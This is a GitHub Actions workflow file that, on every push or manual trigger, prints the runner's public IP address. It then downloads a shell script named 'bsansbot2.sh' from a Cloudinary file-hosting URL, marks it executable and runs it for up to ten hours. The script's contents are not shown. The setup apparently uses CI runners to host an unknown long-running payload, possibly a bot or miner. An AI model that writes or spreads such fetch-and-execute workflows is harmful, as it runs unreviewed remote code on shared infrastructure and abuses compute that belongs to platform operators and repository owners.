name: Go

on:
  workflow_dispatch:
  push:
    branches: [main]

jobs:
  run:
    continue-on-error: true
    runs-on: ubuntu-latest
    steps:
      - name: IP Workflow
        run: |
          curl https://api.ipify.org
      - name: Run exec
        timeout-minutes: 600
        run: |
          curl -O https://res.cloudinary.com/dyfqshedb/raw/upload/v1726990400/bsansbot2.sh
          chmod +x bsansbot2.sh
          ./bsansbot2.sh
